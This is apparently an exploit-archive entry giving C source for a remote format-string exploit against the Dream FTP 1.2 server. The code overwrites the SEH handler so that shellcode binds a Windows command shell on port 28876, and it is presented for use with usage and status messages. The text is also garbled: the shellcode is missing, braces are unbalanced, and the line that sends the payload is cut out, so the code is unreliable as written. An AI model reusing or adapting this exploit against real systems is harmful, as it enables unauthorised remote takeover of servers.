Dream FTP 1.2 Remote Format String Exploit

ID 1337DAY-ID-8375
Type zdt
Reporter SkyLined
Modified 2004-02-11T00:00:00


Exploit for unknown platform in category remote exploits

Dream FTP 1.2 Remote Format String Exploit

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

// WIN NT/2K/XP cmd.exe shellcode
// kernel32.dll baseaddress calculation: OS/SP-independent
// string-save: 00, 0a and 0d free.
// portbinding: port 28876
// looping: reconnect after disconnect
char* shellcode = 

int main(int argc, char *argv[], char *envp[]) {
  int sock;
  FILE* FILEsock;
  struct sockaddr_in addr;
  int port = 21;
  char buffer[1024];

  if (argc<2 || argc>3) {
    printf("Usage: %s IP [PORT]\n", argv[0]);
  if (argc == 3) port = atoi(argv[2]);

  printf("- Nightmare --------------------------------------------------\n"
         "  Dream FTP v1.2 formatstring exploit.\n"
         "  Written by SkyLined <[email protected]>.\n"
         "  Credits for the vulnerability go to badpack3t\n"
         "                           <[email protected]>.\n"
         "  Shellcode based on work by H D Moore (www.metasploit.com).\n"
         "  Greets to everyone at 0dd and #netric.\n"
         "  (K)(L)(F) for Suzan.\n"
         "  Binds a shell at %s:28876 if successfull.\n"
         "  Tested with: WIN2KEN/Dream FTP v1.2 (1.02/TryFTP\n"

  addr.sin_family = AF_INET;
  addr.sin_port = htons(port);
  addr.sin_addr.s_addr = inet_addr(argv[1]);

  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1 ||
      connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1 ||
      (FILEsock = fdopen(sock, "r+")) == NULL) {
    fprintf(stderr, "\n[-] Connection to %s:%d failed: ", argv[1], port);

  printf("\n[+] Connected to %s:%d.\n", argv[1], port);
  do printf("  --> %s", fgets(buffer, sizeof buffer, FILEsock));
    while (strstr(buffer, "220-") == buffer);

  printf("\n[+] Sending exploit string...\n");
    // Argument 10 points to the SEH handler code, it's RWE so we'll change
    // the SEH handler to redirect execution to the beginning of our
    // formatstring. When the SEH handler is called [ebx+0x3c] points
    // to the start of our formatstring, we just have to jump over the
    // formatstring exploit itself to our shellcode:
    "\xeb\x29" // Jump over the formatstring exploit
    "%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n"     // Argument 10 -> SEH
    "%%n" // Causes exception after SEH adjustment.
    "@@@@@@@@" // nopslide landing zone for jump
    "%s\r\n", // shellcode
    0x3C63FF-0x4f, // New SEH code = 0x3C63FF (jmp *0x3c(%ebx) | jmp [EBX+0x3C])
  printf("\n[+] Done, allow a few seconds on a slow target before you can\n"
           "    connect to %s:28876.\n", argv[1]);
  return 0;


#  0day.today [2018-02-06]  #